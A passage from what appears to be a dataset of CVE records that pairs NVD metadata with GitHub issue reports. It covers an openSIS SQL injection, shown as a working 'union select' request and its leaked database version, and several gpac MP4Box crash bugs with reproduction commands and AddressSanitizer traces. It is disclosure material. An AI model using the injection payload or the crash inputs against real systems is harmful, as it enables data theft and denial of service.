Accept-Encoding: gzip, deflate
Accept-Language: vi,vi-VN;q=0.9,fr;q=0.8,en-US;q=0.7,en;q=0.6,sm;q=0.5,la;q=0.4,zh-CN;q=0.3,zh-TW;q=0.2,zh;q=0.1
Cookie: cywg_2132_saltkey=E2w57uH2; cywg_2132_lastvisit=1630101103; cywg_2132_ulastactivity=6590uIjzBHML3smc7veG8yziPxJyaiN4jgoE9aN3L3FvOCr3Ov1_; ORRL_2132_saltkey=SSddxNX7; ORRL_2132_lastvisit=1630117184; ORRL_2132_ulastactivity=4e4933KaEc2d5jrijCQZlYd-PcZ8j470p8v4gqPXPHDs6JlJdGR4; ORRL_2132_forum_lastvisit=D_1_1630131788D_index_1630131832; PHPSESSID=i3j7fp3hcjbmot1d60daol514a
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 78
ADDR_CONT_USRN=123&ADDR_CONT_PSWD="+union+select+1,2,3,4,version(),6,7,8,9--+-
```
### Response
```
HTTP/1.1 200 OK
Date: Wed, 01 Sep 2021 12:38:58 GMT
Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1k PHP/7.4.21
X-Powered-By: PHP/7.4.21
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Length: 1372
Connection: close
Content-Type: text/html; charset=UTF-8
Array
(
[ADDR_PRIM_L1] =>
[ADDR_PRIM_L2] =>
[ADDR_PRIM_CITY] =>
[ADDR_PRIM_STATE] =>
[ADDR_PRIM_ZIP] =>
[ADDR_PRIM_BUSNO] =>
[ADDR_PRIM_BPU] =>
[ADDR_PRIM_BDO] =>
[ADDR_SAME_HOME] =>
[ADDR_SAME_AS] =>
[ADDR_MAIL_L1] =>
[ADDR_MAIL_L2] =>
[ADDR_MAIL_CITY] =>
[ADDR_MAIL_STATE] =>
[ADDR_MAIL_ZIP] =>
[ADDR_CONT_RSHIP] =>
[ADDR_CONT_FIRST] =>
[ADDR_CONT_LAST] =>
[ADDR_CONT_HOME] =>
[ADDR_CONT_WORK] =>
[ADDR_CONT_CELL] =>
[ADDR_CONT_MAIL] =>
[ADDR_CONT_CUSTODY] =>
[ADDR_CONT_PORTAL] =>
[ADDR_CONT_USRN] => 123
[ADDR_CONT_PSWD] => 10.4.20-MariaDB
[ADDR_CONT_SAHA] =>
[ADDR_CONT_ADNA] =>
[ADDR_CONT_LIN1] =>
[ADDR_CONT_LIN2] =>
[ADDR_CONT_CITY] =>
[ADDR_CONT_STAT] =>
[ADDR_CONT_ZIP] =>
[CHK_HOME_ADDR_PRIM] =>
[SECN_CONT_RSHIP] =>
[SECN_CONT_FIRST] =>
[SECN_CONT_LAST] =>
[SECN_CONT_HOME] =>
[SECN_CONT_WORK] =>
[SECN_CONT_CELL] =>
[SECN_CONT_MAIL] =>
[SECN_CONT_CUSTODY] =>
[SECN_CONT_PORTAL] =>
[SECN_CONT_USRN] =>
[SECN_CONT_PSWD] =>
[SECN_CONT_LIN1] =>
[SECN_CONT_LIN2] =>
[SECN_CONT_CITY] =>
[SECN_CONT_STAT] =>
[SECN_CONT_ZIP] =>
[CHK_HOME_ADDR_SECN] =>
[SELECTED_PRIMARY] =>
[SELECTED_SECONDARY] =>
)
```
### PoC:

| SQL Injection in file HoldAddressFields.php | https://api.github.com/repos/OS4ED/openSIS-Classic/issues/193/comments | 2 | 2021-09-01T12:48:52Z | 2021-09-09T22:20:28Z | https://github.com/OS4ED/openSIS-Classic/issues/193 | 985,110,700 | 193 | 2,693 |
CVE-2020-22673 | 2021-10-12T21:15:07.373 | Memory leak in the senc_Parse function in MP4Box in gpac 0.8.0 allows attackers to cause a denial of service (DoS) via a crafted input. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": true
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.8,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/gpac/gpac/issues/1342"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/gpac/gpac/issues/1342"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:gpac:gpac:0.8.0:*:*:*:*:*:*:*",
"matchCriteriaId": "93EEFCFD-7417-40E6-84BF-4EA630F2A8A1",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"401"
] | 401 | https://github.com/gpac/gpac/issues/1342 | [
"Exploit",
"Patch",
"Third Party Advisory"
] | github.com | [
"gpac",
"gpac"
] | Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue - thank you!
[ √] I looked for a similar issue and couldn't find any.
[ √] I tried with the latest version of GPAC. Installers available at http://gpac.io/downloads/gpac-nightly-builds/
[ √] I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command-line ...). I can share files anonymously with this dropbox: https://www.mediafire.com/filedrop/filedrop_hosted.php?drop=eec9e058a9486fe4e99c33021481d9e1826ca9dbc242a6cfaab0fe95da5e5d95
Detailed guidelines: http://gpac.io/2013/07/16/how-to-file-a-bug-properly/
A crafted input will lead to crash in box_code_drm.c at gpac 0.8.0.
Triggered by
./MP4Box -diso POC -out /dev/null
Poc
[004-memleak-senc1349](https://github.com/gutiniao/afltest/blob/master/004-memleak-senc1349)
The ASAN information is as follows:
```
./MP4Box -diso 004-memleak-senc1349 -out /dev/null
[iso file] Box "avcC" (start 939) has 34 extra bytes
[iso file] Unknown box type 0000 in parent sinf
[iso file] Unknown box type 75876C20 in parent dref
[iso file] Unknown box type 0000 in parent schi
[iso file] Unknown box type stts in parent stsd
[iso file] Unknown box type stsc in parent stsd
[iso file] Unknown box type stsz in parent stsd
[iso file] Unknown box type stco in parent stsd
[iso file] Unknown box type sgpd in parent stsd
[iso file] Unknown box type udta in parent stsd
[iso file] Box "stsd" (start 1439) has 8825 extra bytes
[iso file] Box "stsd" is larger than container box
[iso file] Box "stbl" size 291 (start 1431) invalid (read 9139)
[ISO file] dataReferenceIndex set to 0 in sample entry, overriding to 1
[ISO file] dataReferenceIndex set to 0 in sample entry, overriding to 1
[ISO file] dataReferenceIndex set to 0 in sample entry, overriding to 1
[ISO file] dataReferenceIndex set to 0 in sample entry, overriding to 1
[iso file] senc box without tenc, assuming MS smooth+piff
[isobmf] Failed to parse SENC box, invalid SAI size
[isobmf] could not get cenc info for sample 1: Invalid IsoMedia File
Error opening file 004-memleak-senc1349: Invalid IsoMedia File
=================================================================
==2371==ERROR: LeakSanitizer: detected memory leaks
Direct leak of 32 byte(s) in 1 object(s) allocated from:
#0 0x7f0fc2519b50 in __interceptor_malloc (/usr/lib/x86_64-linux-gnu/libasan.so.4+0xdeb50)
#1 0x564665fcabe9 in senc_Parse isomedia/box_code_drm.c:1349
SUMMARY: AddressSanitizer: 32 byte(s) leaked in 1 allocation(s).
```
about code:
```
#endif
count = gf_bs_read_u32(bs);
if (!senc->samp_aux_info) senc->samp_aux_info = gf_list_new();
for (i=0; i<count; i++) {
u32 is_encrypted;
---------->GF_CENCSampleAuxInfo *sai = (GF_CENCSampleAuxInfo *)gf_malloc(sizeof(GF_CENCSampleAuxInfo));
memset(sai, 0, sizeof(GF_CENCSampleAuxInfo));
``` | There are memory leaks in the senc_Parse function of box_code_drm.c:1349 | https://api.github.com/repos/gpac/gpac/issues/1342/comments | 1 | 2019-11-13T04:06:43Z | 2020-01-09T17:59:51Z | https://github.com/gpac/gpac/issues/1342 | 521,946,411 | 1,342 | 2,694 |
CVE-2020-22674 | 2021-10-12T21:15:07.417 | An issue was discovered in gpac 0.8.0. An invalid memory dereference exists in the function FixTrackID located in isom_intern.c, which allows attackers to cause a denial of service (DoS) via a crafted input. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": true
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.8,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/gpac/gpac/issues/1346"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/gpac/gpac/issues/1346"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:gpac:gpac:0.8.0:*:*:*:*:*:*:*",
"matchCriteriaId": "93EEFCFD-7417-40E6-84BF-4EA630F2A8A1",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"476"
] | 476 | https://github.com/gpac/gpac/issues/1346 | [
"Exploit",
"Patch",
"Third Party Advisory"
] | github.com | [
"gpac",
"gpac"
] | Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue - thank you!
[ √] I looked for a similar issue and couldn't find any.
[ √] I tried with the latest version of GPAC. Installers available at http://gpac.io/downloads/gpac-nightly-builds/
[ √] I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command-line ...). I can share files anonymously with this dropbox: https://www.mediafire.com/filedrop/filedrop_hosted.php?drop=eec9e058a9486fe4e99c33021481d9e1826ca9dbc242a6cfaab0fe95da5e5d95
Detailed guidelines: http://gpac.io/2013/07/16/how-to-file-a-bug-properly/
A crafted input will lead to crash in isom_intern.c at gpac 0.8.0.
Triggered by
./MP4Box -diso POC -out /dev/null
Poc
[009-invalid-FixTrackID](https://github.com/gutiniao/afltest/blob/master/009-invalid-FixTrackID)
The ASAN information is as follows:
```
./MP4Box -diso 009-invalid-FixTrackID -out /dev/null
[iso file] Box "avcC" (start 939) has 34 extra bytes
[iso file] Unknown box type 0000 in parent sinf
[iso file] Unknown box type 74E8036B in parent moov
[iso file] Unknown box type tfhd in parent moof
[iso file] Box "UNKN" is larger than container box
[iso file] Box "moof" size 1463 (start 2004) invalid (read 7972)
ASAN:DEADLYSIGNAL
=================================================================
==13653==ERROR: AddressSanitizer: SEGV on unknown address 0x000000000028 (pc 0x564b3322e701 bp 0x60d000000110 sp 0x7fff462fc3f0 T0)
==13653==The signal is caused by a READ memory access.
==13653==Hint: address points to the zero page.
#0 0x564b3322e700 in FixTrackID isomedia/isom_intern.c:133
#1 0x564b3322e700 in gf_isom_parse_movie_boxes isomedia/isom_intern.c:372
#2 0x564b3322fbca in gf_isom_open_file isomedia/isom_intern.c:615
#3 0x564b32f78852 in mp4boxMain /home/liuz/gpac-master/applications/mp4box/main.c:4767
#4 0x7fd75e925b96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96)
#5 0x564b32f69b19 in _start (/usr/local/gpac-asan3/bin/MP4Box+0x163b19)
AddressSanitizer can not provide additional info.
SUMMARY: AddressSanitizer: SEGV isomedia/isom_intern.c:133 in FixTrackID
==13653==ABORTING
``` | Segmentation fault (ASAN: SEGV on unknown address) in the FixTrackID function of isom_intern.c:133 | https://api.github.com/repos/gpac/gpac/issues/1346/comments | 1 | 2019-11-13T07:15:54Z | 2020-01-09T18:00:04Z | https://github.com/gpac/gpac/issues/1346 | 522,006,717 | 1,346 | 2,695 |
CVE-2020-22675 | 2021-10-12T21:15:07.457 | An issue was discovered in gpac 0.8.0. The GetGhostNum function in stbl_read.c has a heap-based buffer overflow which can lead to a denial of service (DOS) via a crafted input. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": true
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.8,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/gpac/gpac/issues/1344"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/gpac/gpac/issues/1344"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:gpac:gpac:0.8.0:*:*:*:*:*:*:*",
"matchCriteriaId": "93EEFCFD-7417-40E6-84BF-4EA630F2A8A1",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"787"
] | 787 | https://github.com/gpac/gpac/issues/1344 | [
"Exploit",
"Patch",
"Third Party Advisory"
] | github.com | [
"gpac",
"gpac"
] | Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue - thank you!
[ √] I looked for a similar issue and couldn't find any.
[ √] I tried with the latest version of GPAC. Installers available at http://gpac.io/downloads/gpac-nightly-builds/
[ √] I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command-line ...). I can share files anonymously with this dropbox: https://www.mediafire.com/filedrop/filedrop_hosted.php?drop=eec9e058a9486fe4e99c33021481d9e1826ca9dbc242a6cfaab0fe95da5e5d95
Detailed guidelines: http://gpac.io/2013/07/16/how-to-file-a-bug-properly/
A crafted input will lead to crash in stbl_read.c at gpac 0.8.0.
Triggered by
./MP4Box -diso POC -out /dev/null
Poc
[006GetGhostNum-heap](https://github.com/gutiniao/afltest/blob/master/006GetGhostNum-heap)
The ASAN information is as follows:
```
./MP4Box -diso 006GetGhostNum-heap -out /dev/null
[iso file] Box "avcC" (start 939) has 34 extra bytes
[iso file] Unknown box type 0000 in parent sinf
[iso file] Box "dref" (start 1403) has 4 extra bytes
[iso file] Missing DataInformationBox
[iso file] Box "minf" (start 1371) has 291 extra bytes
[iso file] Track with no sample table !
[iso file] Track with no sample description box !
=================================================================
==7153==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x602000000454 at pc 0x5572c94aafff bp 0x7fff10f02f50 sp 0x7fff10f02f40
READ of size 4 at 0x602000000454 thread T0
#0 0x5572c94aaffe in GetGhostNum isomedia/stbl_read.c:369
#1 0x5572c94aaffe in stbl_GetSampleInfos isomedia/stbl_read.c:436
#2 0x5572c943e253 in gf_isom_get_sample_cenc_info_ex isomedia/isom_read.c:4153
#3 0x5572c98c8c2f in senc_Parse isomedia/box_code_drm.c:1353
#4 0x5572c94203e6 in gf_isom_parse_movie_boxes isomedia/isom_intern.c:399
#5 0x5572c9422bca in gf_isom_open_file isomedia/isom_intern.c:615
#6 0x5572c916b852 in mp4boxMain /home/liuz/gpac-master/applications/mp4box/main.c:4767
#7 0x7f0e00306b96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96)
#8 0x5572c915cb19 in _start (/usr/local/gpac-asan3/bin/MP4Box+0x163b19)
0x602000000454 is located 3 bytes to the right of 1-byte region [0x602000000450,0x602000000451)
allocated by thread T0 here:
#0 0x7f0e00f8fb50 in __interceptor_malloc (/usr/lib/x86_64-linux-gnu/libasan.so.4+0xdeb50)
#1 0x5572c98a424a in stsc_Read isomedia/box_code_base.c:5734
SUMMARY: AddressSanitizer: heap-buffer-overflow isomedia/stbl_read.c:369 in GetGhostNum
Shadow bytes around the buggy address:
0x0c047fff8030: fa fa 00 00 fa fa 00 00 fa fa 00 00 fa fa 01 fa
0x0c047fff8040: fa fa 00 00 fa fa 00 00 fa fa 00 00 fa fa 00 00
0x0c047fff8050: fa fa 00 00 fa fa 00 00 fa fa 00 00 fa fa 00 00
0x0c047fff8060: fa fa 00 00 fa fa 00 00 fa fa 00 00 fa fa 00 00
0x0c047fff8070: fa fa 00 00 fa fa 00 00 fa fa fd fd fa fa fd fd
=>0x0c047fff8080: fa fa 00 00 fa fa 01 fa fa fa[01]fa fa fa 00 00
0x0c047fff8090: fa fa 00 00 fa fa 00 00 fa fa 00 00 fa fa 01 fa
0x0c047fff80a0: fa fa 00 00 fa fa 00 00 fa fa 00 00 fa fa 00 00
0x0c047fff80b0: fa fa 00 fa fa fa 00 00 fa fa 00 00 fa fa 00 00
0x0c047fff80c0: fa fa 00 00 fa fa 00 00 fa fa 00 00 fa fa 01 fa
0x0c047fff80d0: fa fa 00 00 fa fa 00 00 fa fa 00 00 fa fa 00 fa
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==7153==ABORTING
``` | There is a heap-buffer-overflow in the GetGhostNum function of stbl_read.c:369 | https://api.github.com/repos/gpac/gpac/issues/1344/comments | 1 | 2019-11-13T05:18:43Z | 2020-01-09T17:59:57Z | https://github.com/gpac/gpac/issues/1344 | 521,966,021 | 1,344 | 2,696 |
CVE-2020-22677 | 2021-10-12T21:15:07.497 | An issue was discovered in gpac 0.8.0. The dump_data_hex function in box_dump.c has a heap-based buffer overflow which can lead to a denial of service (DOS) via a crafted input. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": true
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.8,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/gpac/gpac/issues/1341"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/gpac/gpac/issues/1341"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:gpac:gpac:0.8.0:*:*:*:*:*:*:*",
"matchCriteriaId": "93EEFCFD-7417-40E6-84BF-4EA630F2A8A1",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"787"
] | 787 | https://github.com/gpac/gpac/issues/1341 | [
"Exploit",
"Patch",
"Third Party Advisory"
] | github.com | [
"gpac",
"gpac"
] | Thanks for reporting your issue. Please make sure these boxes are checked before submitting your issue - thank you!
[ √] I looked for a similar issue and couldn't find any.
[ √] I tried with the latest version of GPAC. Installers available at http://gpac.io/downloads/gpac-nightly-builds/
[ √] I give enough information for contributors to reproduce my issue (meaningful title, github labels, platform and compiler, command-line ...). I can share files anonymously with this dropbox: https://www.mediafire.com/filedrop/filedrop_hosted.php?drop=eec9e058a9486fe4e99c33021481d9e1826ca9dbc242a6cfaab0fe95da5e5d95
Detailed guidelines: http://gpac.io/2013/07/16/how-to-file-a-bug-properly/
A crafted input will lead to crash in box_dump.c at gpac 0.8.0.
Triggered by
./MP4Box -diso POC -out /dev/null
Poc
[003-heep-dump_data51](https://github.com/gutiniao/afltest/blob/master/003-heep-dump_data51)
The ASAN information is as follows:
```
./MP4Box -diso 003-heep-dump_data51 -out /dev/null
[iso file] Box "avcC" (start 939) has 34 extra bytes
[iso file] Unknown box type 0000 in parent sinf
[iso file] Unknown box type 0000 in parent schi
[iso file] Box "tfhd" size 20 (start 2642) invalid (read 28)
[iso file] senc box without tenc, assuming MS smooth+piff
[isobmf] Failed to parse SENC box, invalid SAI size
[isobmf] Failed to parse SENC box, invalid SAI size
[iso file] Unknown top-level box type 00303030
[iso file] Incomplete box 00303030 - start 3467 size 808453500
[iso file] Incomplete file while reading for dump - aborting parsing
=================================================================
==5711==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x603000000990 at pc 0x563f30697440 bp 0x7ffd8a7496b0 sp 0x7ffd8a7496a0
READ of size 1 at 0x603000000990 thread T0
#0 0x563f3069743f in dump_data_hex isomedia/box_dump.c:51
#1 0x563f3069743f in senc_dump isomedia/box_dump.c:4823
#2 0x563f306a06ad in gf_isom_box_dump_ex isomedia/box_funcs.c:1738
#3 0x563f3067c5bc in gf_isom_box_dump isomedia/box_dump.c:97
#4 0x563f3067c5bc in gf_isom_box_array_dump isomedia/box_dump.c:107
#5 0x563f306a07cf in gf_isom_box_dump_done isomedia/box_funcs.c:1747
#6 0x563f3068b939 in traf_dump isomedia/box_dump.c:2461
#7 0x563f306a06ad in gf_isom_box_dump_ex isomedia/box_funcs.c:1738
#8 0x563f3067c5bc in gf_isom_box_dump isomedia/box_dump.c:97
#9 0x563f3067c5bc in gf_isom_box_array_dump isomedia/box_dump.c:107
#10 0x563f306a07cf in gf_isom_box_dump_done isomedia/box_funcs.c:1747
#11 0x563f3068b389 in moof_dump isomedia/box_dump.c:2431
#12 0x563f306a06ad in gf_isom_box_dump_ex isomedia/box_funcs.c:1738
#13 0x563f3067c7f3 in gf_isom_box_dump isomedia/box_dump.c:97
#14 0x563f3067c7f3 in gf_isom_dump isomedia/box_dump.c:139
#15 0x563f3041b734 in dump_isom_xml /home/liuz/gpac-master/applications/mp4box/filedump.c:1930
#16 0x563f30405c92 in mp4boxMain /home/liuz/gpac-master/applications/mp4box/main.c:4982
#17 0x7f6e421e6b96 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b96)
#18 0x563f303f2b19 in _start (/usr/local/gpac-asan3/bin/MP4Box+0x163b19)
0x603000000990 is located 0 bytes to the right of 32-byte region [0x603000000970,0x603000000990)
allocated by thread T0 here:
#0 0x7f6e42e6fb50 in __interceptor_malloc (/usr/lib/x86_64-linux-gnu/libasan.so.4+0xdeb50)
#1 0x563f30b5ebe9 in senc_Parse isomedia/box_code_drm.c:1349
SUMMARY: AddressSanitizer: heap-buffer-overflow isomedia/box_dump.c:51 in dump_data_hex
Shadow bytes around the buggy address:
0x0c067fff80e0: 00 00 00 fa fa fa 00 00 00 fa fa fa 00 00 00 fa
0x0c067fff80f0: fa fa 00 00 00 fa fa fa 00 00 00 fa fa fa 00 00
0x0c067fff8100: 00 fa fa fa 00 00 00 fa fa fa 00 00 00 fa fa fa
0x0c067fff8110: 00 00 00 fa fa fa 00 00 00 fa fa fa 00 00 00 fa
0x0c067fff8120: fa fa 00 00 00 fa fa fa 00 00 00 fa fa fa 00 00
=>0x0c067fff8130: 00 00[fa]fa 00 00 00 00 fa fa fd fd fd fd fa fa
0x0c067fff8140: 00 00 00 00 fa fa fd fd fd fd fa fa fa fa fa fa
0x0c067fff8150: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c067fff8160: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c067fff8170: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c067fff8180: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==5711==ABORTING
```
| There is a heap-buffer-overflow in the dump_data_hex function of box_dump.c:51 | https://api.github.com/repos/gpac/gpac/issues/1341/comments | 1 | 2019-11-13T03:49:59Z | 2020-01-09T17:59:47Z | https://github.com/gpac/gpac/issues/1341 | 521,942,076 | 1,341 | 2,697 |
CVE-2020-22678 | 2021-10-12T21:15:07.540 | An issue was discovered in gpac 0.8.0. The gf_media_nalu_remove_emulation_bytes function in av_parsers.c has a heap-based buffer overflow which can lead to a denial of service (DOS) via a crafted input. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"vectorString": "AV:N/AC:M/Au:N/C:N/I:N/A:P",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": true
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.8,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/gpac/gpac/issues/1339"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/gpac/gpac/issues/1339"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
